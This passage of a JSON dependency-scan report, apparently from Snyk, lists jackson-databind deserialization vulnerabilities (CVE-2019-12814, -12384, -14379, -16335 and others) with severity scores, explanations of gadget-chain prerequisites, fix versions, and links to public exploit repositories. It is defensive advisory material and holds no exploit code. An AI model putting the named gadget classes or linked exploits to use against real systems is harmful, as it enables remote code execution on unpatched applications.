enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2341)\n- [PoC Repository](https://github.com/Al1ex/CVE-2019-12814)\n", - "epssDetails": { - "percentile": "0.87218", - "probability": "0.01539", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-12814" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-cmfg-87vq-g5g4" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-06-19T15:28:46.421239Z", - "functions_new": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-06-19T14:34:16Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-06-19T14:34:16Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.077144Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "credit": [ - "College of software Nankai University" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.9.9.1", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable when the feature Polymorphic Type Handling (PTH) is enabled." - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html", - "title": "Debian Security Announcement" - }, - { - "url": "https://github.com/jas502n/CVE-2019-12384", - "title": "Exploit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", - "title": "Github Fix" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2334", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Jackson CVEs Don't Panic - Blog" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x", - "title": "Release Notes" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:53:36.645685Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:50.734463Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:45.683422Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:36.645685Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:50.734463Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data which allows attackers to have a variety of impacts by leveraging failure to block the `logback-core` class from polymorphic deserialization. Depending on the `classpath` content, remote code execution may be possible.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [Debian Security Announcement](https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html)\n- [Exploit](https://github.com/jas502n/CVE-2019-12384)\n- [Github Fix](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2334)\n- [Jackson CVEs Don't Panic - Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Release Notes](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x)\n", - "epssDetails": { - "percentile": "0.97607", - "probability": "0.53288", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-12384" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mph4-vhrx-mv67" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-06-25T10:06:54.889582Z", - "functions_new": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-05-28T10:27:59Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-06-25T10:26:29Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.734463Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.9.2", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", - "title": "GitHub Comparison" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2387", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2389", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2395", - "title": "GitHub Issue" - }, - { - "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", - "title": "Snyk Blog" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:45.849047Z" - }, - { - "assigner": "Red Hat", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:53:54.502907Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.033731Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:45.849047Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.502907Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14439](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", - "epssDetails": { - "percentile": "0.83638", - "probability": "0.00984", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14379" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6fpp-rgj9-8rwc", - "GHSA-gwp4-hfv6-p7hw" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-07-29T14:55:33.030000Z", - "functions_new": [ - { - "version": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-07-29T12:40:42Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-07-29T12:40:42Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.502907Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.pr2)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2449", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:54.800234Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:53.931793Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:42.808389Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:54.800234Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:53.931793Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariDataSource` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-14540.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2449)\n", - "epssDetails": { - "percentile": "0.71702", - "probability": "0.00342", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-16335" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-85cw-hj65-qqv9" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-09-16T13:03:06.837179Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.pr2)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-09-15T23:30:24Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-09-16T23:30:24Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.931793Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", - "credit": [ - "iSafeBlue" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Functional", - "fixedIn": [ - "2.9.10", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0.pr2)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/LeadroyaL/cve-2019-14540-exploit", - "title": "Exploit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2410", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:47.850814Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.008832Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:42.892322Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:47.850814Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.008832Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariConfig` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-16335.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by 